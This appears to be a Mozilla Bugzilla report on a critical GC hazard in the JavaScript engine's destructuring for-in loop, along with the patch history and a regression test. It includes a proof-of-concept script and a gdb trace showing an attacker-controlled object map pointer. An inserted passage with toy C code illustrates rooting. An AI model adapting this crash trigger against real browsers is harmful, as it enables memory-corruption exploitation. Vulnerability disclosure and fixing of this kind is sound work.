Closed Bug 355410 Opened 18 years ago Closed 18 years ago

GC hazard in for([k,v] in o){...}

Categories

(Core :: JavaScript Engine, defect)

x86
Windows XP
defect
Not set
critical

Tracking


VERIFIED FIXED

People

(Reporter: sync2d, Assigned: igor)

References

Details

(Keywords: crash, verified1.8.1, Whiteboard: [sg:critical?] js1.7 feature)

Attachments

(2 files, 2 obsolete files)

$ cat for-in-kv-GC-hazard.txt
var address = 0xbadf00d0, basket = { food: {} };
var AP = Array.prototype, rooter = {};
AP.__defineGetter__(0, function() { return this[-1]; });
AP.__defineSetter__(0, function(v) {
    basket.food = null;
    for(var i = 0; i < 8 * 1024; i++) {
        rooter[i] = 0x10000000000000 + address; // IEEE754!
    }
    return this[-1] = v;
});
for(var [key, value] in basket) {
    value.trigger;
}
$ gdb --eval run --args dbg.obj/js -b 99999 for-in-kv-GC-hazard.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x00475b83 in js_Interpret (cx=0xb507a0, pc=0xb541b6 "5", result=0xa2ec50) at jsinterp.c:3851
3851        CACHED_GET(OBJ_GET_PROPERTY(cx, obj, id, &rval));
(gdb) print *obj
$1 = {map = 0xbadf00d0, slots = 0x43300000}
...

You can control obj->map, map->ops, ops->getProperty, etc. => exploitable.
Flags: blocking1.9?
Flags: blocking1.8.1?
Flags: blocking1.8.1.1?
Flags: blocking1.8.0.9?
It seems to me it is a dup of bug 354499.
To shutdown@flashmail.com: I am curious, did you find this with the help of some tool or just by checking the source? If the former, then we should land the fix ASAP.
Depends on: 354499
Note that this is not a duplicate of bug 354499; it is a different problem that is not covered by the original case.
To clarify the situation: with the cleanup patch for bug 354982 landed, the fix for bug 354499 would be enough to solve the problem. If it were necessary to fix the issue before that, we would need an extra patch that roots the atom.
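The comments above turn on one discipline: a value the interpreter still holds must be rooted for as long as arbitrary script (here, the setter invoked by the destructuring assignment) can run and trigger a collection. The following is an added illustration of that discipline on a toy mark-and-sweep heap; it is not SpiderMonkey code and not the patch from this bug, and the heap, `alloc`, `push_root`/`pop_root` and `run_setter` are all constructed for the example.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Toy mark-and-sweep heap, constructed for illustration only: it is not
   SpiderMonkey code and models nothing of its real allocator. */
#define HEAP_CELLS 8
#define MAX_ROOTS  8

typedef struct Cell {
    bool live;    /* allocated and not yet swept */
    bool marked;  /* reached from a root during the current collection */
    int  value;   /* payload; stands in for the object's contents */
} Cell;

static Cell   heap[HEAP_CELLS];
static Cell  *roots[MAX_ROOTS];
static size_t nroots;
static int    collections;

static void heap_reset(void) {
    memset(heap, 0, sizeof heap);
    nroots = 0;
    collections = 0;
}

/* Mark everything on the root stack, sweep the rest. Swept cells are
   poisoned so that a stale read is visible instead of silently "working". */
static void gc(void) {
    collections++;
    for (size_t i = 0; i < nroots; i++)
        roots[i]->marked = true;
    for (size_t i = 0; i < HEAP_CELLS; i++) {
        if (heap[i].live && !heap[i].marked) {
            heap[i].live  = false;
            heap[i].value = 0xBAD;
        }
        heap[i].marked = false;
    }
}

/* Allocate a cell; when the heap is full, collect once and retry. */
static Cell *alloc(int value) {
    for (int attempt = 0; attempt < 2; attempt++) {
        for (size_t i = 0; i < HEAP_CELLS; i++) {
            if (!heap[i].live) {
                heap[i].live  = true;
                heap[i].value = value;
                return &heap[i];
            }
        }
        gc();
    }
    return NULL; /* out of memory even after collecting */
}

static void push_root(Cell *c) { assert(nroots < MAX_ROOTS); roots[nroots++] = c; }
static void pop_root(void)     { assert(nroots > 0); nroots--; }

/* Stands in for the script-visible setter in the report: arbitrary code that
   allocates enough to force a collection while the engine is still in the
   middle of the destructuring assignment. */
static void run_setter(void) {
    for (int i = 0; i < HEAP_CELLS; i++)
        alloc(i); /* results are dropped, so they are garbage immediately */
}

/* The hazard: hold a raw pointer across code that can trigger GC. */
static int unrooted_sequence(void) {
    heap_reset();
    Cell *value = alloc(42);
    run_setter();          /* frees `value` and hands its cell to the setter */
    return value->value;   /* no longer 42: reads whatever the setter stored */
}

/* The fix pattern: root the value for as long as it is held. */
static int rooted_sequence(void) {
    heap_reset();
    Cell *value = alloc(42);
    push_root(value);
    run_setter();          /* a collection still happens, but `value` survives it */
    pop_root();
    return value->value;   /* 42 */
}

int main(void) {
    printf("unrooted: %d\n", unrooted_sequence());
    int rooted = rooted_sequence();
    printf("rooted:   %d (after %d collection)\n", rooted, collections);
    return 0;
}
```

In the unrooted path the cell that held 42 is swept and immediately reused by the setter's own allocation, so the caller reads the setter's data through a pointer it believes is still its object, which is the same shape of failure as the `map = 0xbadf00d0` seen in the gdb session above. Rooting costs a push and a pop around the call, which is the trade the reviewer accepts in the comments below.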
Assignee: general → igor.bukanov
Attached patch Quick fix for for 1.8.1-only (obsolete) (deleted) — Splinter Review
This is a patch for the 1.8.1 branch, in case it is necessary to resolve this before landing the cleanup patch from bug 354982 on the 1.8.1 branch. Otherwise the patch should *not* be applied.
Attachment #241274 - Flags: review?(brendan)
Attachment #241274 - Flags: approval1.8.1?
The previous patch was empty.
Attachment #241274 - Attachment is obsolete: true
Attachment #241275 - Flags: review?(brendan)
Attachment #241275 - Flags: approval1.8.1?
Attachment #241274 - Flags: review?(brendan)
Attachment #241274 - Flags: approval1.8.1?
Comment on attachment 241275 [details] [diff] [review]
Quick fix for for 1.8.1-only for real

I'd rather take the larger patch, but sure -- this is brute force, at the cost of an atomic increment and decrement.

/be
Attachment #241275 - Flags: review?(brendan) → review+
(In reply to comment #2)
> To shutdown@flashmail.com : I am curious, did you find this with a help
> of some tool or just by checking the source? If the former, then we
> should land the fix ASAP.

Just by checking the source.
Blocking for Fx2 RC3
Flags: blocking1.8.1? → blocking1.8.1+
Comment on attachment 241275 [details] [diff] [review]
Quick fix for for 1.8.1-only for real

Approved for RC3.
Attachment #241275 - Flags: approval1.8.1? → approval1.8.1+
I committed the patch from comment 6 to MOZILLA_1_8_BRANCH:

Checking in jsinterp.c;
/cvsroot/mozilla/js/src/jsinterp.c,v  <--  jsinterp.c
new revision: 3.181.2.69; previous revision: 3.181.2.68
done
Status: NEW → RESOLVED
Closed: 18 years ago
Keywords: fixed1.8.1
Resolution: --- → FIXED
Attached file js1_7/regress/regress-355410.js (obsolete) (deleted) —
Flags: in-testsuite+
This appears to be a js1.7 fix that's not needed in 1.8.0.8 -- please renominate if I'm wrong.
Flags: blocking1.8.0.9? → blocking1.8.0.8-
Whiteboard: [sg:critical?] js1.7 feature
Verified fixed 20061009 1.8 windows/linux/mac* 1.9 windows/linux. Note the harness failed to capture the test results but did not crash. Running the test manually showed no problems.
Status: RESOLVED → VERIFIED
Attached file js1_7/regress/regress-355410.js (deleted) —
reset Array.prototype[0]
Attachment #241705 - Attachment is obsolete: true
Flags: blocking1.8.1.1?
Group: security
/cvsroot/mozilla/js/tests/js1_7/extensions/regress-355410.js,v <-- regress-355410.js